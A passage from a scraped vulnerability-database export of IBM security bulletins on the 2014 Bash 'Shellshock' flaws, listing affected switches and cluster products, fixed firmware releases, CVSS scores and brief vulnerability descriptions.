Multilayer Director \n**2054-E07 **(2062-D07) MDS 9509 Multilayer Director \n**2053-424 **(2417-C24) MDS 9124 Fabric Switch \n**2053-434 **(2053-S34) MDS 9134 Fabric Switch \n**2417-C48 **MDS 9148 Fabric Switch \n**3722-S51 **5010 Switch \n**3722-S52 **5020 Switch\n\n## Remediation/Fixes\n\nIBM recommends that you remediate the Bash vulnerability by updating to the following code release. \n \n**NX-OS Release 6.2(9a)** \n \n**Release Information:** \n<http://www.cisco.com/c/en/us/td/docs/switches/datacenter/mds9000/sw/6_2/release/notes/nx-os/mds_nxos_rn_629a.html> \n \n \n \n**NX-OS Release 5.2(8e)** \n \n**Release Information:** \n<http://www.cisco.com/c/en/us/td/docs/switches/datacenter/mds9000/sw/5_2/release/notes/nx-os/mds_nxos_rn_528e.html> \n \n \n \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information.\n\n## Workarounds and Mitigations\n\n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www-03.ibm.com/systems/z/advantages/security/integrity_sub.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n[__On-line Calculator V2__](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_IBM Secure Engineering Web Portal _](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n[_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Change History\n\n16 October 2014: Original Version Published \n03 November 2014 CVE info for 7186 and 7187 \n03 November 2014 Added Link to fix in th e5.2(8e) code level\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSU6LN\",\"label\":\"Cisco MDS 9710 Multilayer Director\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"Enterprise\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"HWQQQ\",\"label\":\"PRODUCT NOT FOUND\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"HWQQQ\",\"label\":\"PRODUCT NOT FOUND\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"ST6VQW\",\"label\":\"Storage area network (SAN)-\\u003ECisco MDS 9124 Fabric Switch\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"HWQQQ\",\"label\":\"PRODUCT NOT FOUND\"},\"Business Unit\":{\"code\":\"BU055\",\"label\":\"Cognitive Applications\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"SSY5QTU\",\"label\":\"Cisco MDS 9250i Multiservice Fabric Switch\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"SSBDGXE\",\"label\":\"Cisco MDS 9506 Multilayer Director\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"ST7SML\",\"label\":\"Storage area network (SAN)-\\u003ECisco MDS 9509 Multilayer Director\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STTQ3Y\",\"label\":\"Cisco MDS 9513 Multiplayer Director\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T15:07:09", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect IBM/Cisco Switches and Directors (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-04-11T15:07:09", "id": "A6544AE2F106D4044D792AEEA71A0CA740A53B749B99628C2699395F9F087031", "href": "https://www.ibm.com/support/pages/node/690071", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T23:29:50", "description": "## Summary\n\nInformation about security vulnerabilities affecting multiple products shipped as components of Intelligent Cluster has been published in security bulletins.\n\n## Vulnerability Details\n\n## Abstract\n\nInformation about security vulnerabilities affecting multiple products shipped as components of Intelligent Cluster has been published in security bulletins.\n\n## Content\n\n**Vulnerability Details:**\n\nPlease consult the security bulletins below for vulnerability details and information about fixes:\n\n * [ Intel Xeon Phi PCIe adapters](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503>)\n * Mellanox SX6536, SX6036, and SX1036\n * [ IBM Flex System FC3171 8Gb SAN Switch](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096678>)\n * [ IBM Flex System EN6131 40Gb Ethernet Switch](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096533>)\n * [ IBM Flex System IB6131 Infiniband Switch](<http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096533>)\n * [Storwize V3700](<http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004897>)\n * [ IBM Flex System FC5022 16Gb SAN Switch](<https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm_flex_system_fc5022_16gb_san_scalable_switch_fc5022_24_port_16gb_esb_san_scalable_switch_fc5022_24_port_16gb_san_scalable_switch_and_two_16gb_fc_sfps_firmware_is_affected_by_the_following_openssl_vulnerabilities?lang=en_us>)\n * [ DDN SFA12000 and SFA7700](<http://www.ddn.com/download/tech-support-bulletins/hot-bulletins/SFA%20OS%20Mandatory%20Upgrades%20Fix%20Shellshock%20BASH%20Bug.pdf?89d02a>)\n * Intel True Scale 12000 Series Switches\n * [ IBM SAN24B Series Switches](<http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CCwQFjAC&url=http%3A%2F%2Fwww.brocade.com%2Fdownloads%2Fdocuments%2Ftechnical_support_bulletins%2Fbrocade-assessment-bashabug-vulnerability.pdf&ei=BIDbVLjgLs31oASn44DAAg&usg=AFQjCNHJH46mCrLvDsXKFyxZIVqW_YJ46Q&bvm=bv.85761416,d.aWw&cad=rja>)\n\nNote: Not all supported products have a corresponding security bulletin.\n\n## Affected products and versions\n\nAffected Supporting Product | Fix Version | Intelligent Cluster Best Recipe \n---|---|--- \nIntel Xeon Phi PCIe | 3.3.2 | 14B (01/2015) \nMellanox SX6536, SX6036, and SX1036 | 3.4.0012 | 14B (01/2015) \nIBM Flex System FC3171 | 9.1.3.05.00c | 14B (01/2015) \nIBM Flex System EN6131 | 3.4.0000 | 14B (01/2015) \nIBM Flex System IB6131 | 3.4.0000 | 14B (01/2015) \nIBM Flex System FC5022 | 7.2.1c1 | 14B (01/2015) \nIntel True Scale 12000 Series Switches | 7.3.0.0.15 | 14B (01/2015) \nDDN SFA12000 and SFA7700 | 2.2.1.3-21587 | 14B (01/2015) \nStorwize V3700 | 7.3.0.8 | 14B (01/2015) \nIBM SAN 24B Series Switches | 7.2.1d | 14B (01/2015) \n \n## Remediation/Fixes:\n\nSee Fix Versions in the table above.\n\nThe Intelligent Cluster Best Recipe 14B in Fix Central includes Mellanox OFED for IBM. See also [ http://www.mellanox.com/page/firmware_table_IBM_Intelligent_Clusters](<http://www.mellanox.com/page/firmware_table_IBM_Intelligent_Clusters>).\n\n## Workaround(s) & Mitigation(s):\n\nNone\n\nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information.\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement**\n\nNone\n\n**Change History** \n11 February 2015: Added DDN, FC5022, Intel True Scale, SAN 24B, and updated Mellanox \n12 January 2015: Original Copy Published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\n**Disclaimer**\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOn \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n## Operating System\n\nSystem x Integrated Solutions:Operating system independent / None\n\n[{\"Type\":\"HW\",\"Business Unit\":{\"code\":\"BU016\",\"label\":\"Multiple Vendor Support\"},\"Product\":{\"code\":\"HWC20\",\"label\":\"System x Integrated Solutions->Intelligent Cluster\"},\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {}, "published": "2019-01-31T01:45:01", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Bash affect multiple products shipped with Intelligent Cluster (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2019-01-31T01:45:01", "id": "A6C5FDEF17751F9D6EC0D701C42B168DAF0AFD9B01217970935FD1F4EB568753", "href": "https://www.ibm.com/support/pages/node/866188", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-13T23:42:27", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by TSSC..\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96153_**](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96209_**](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xfo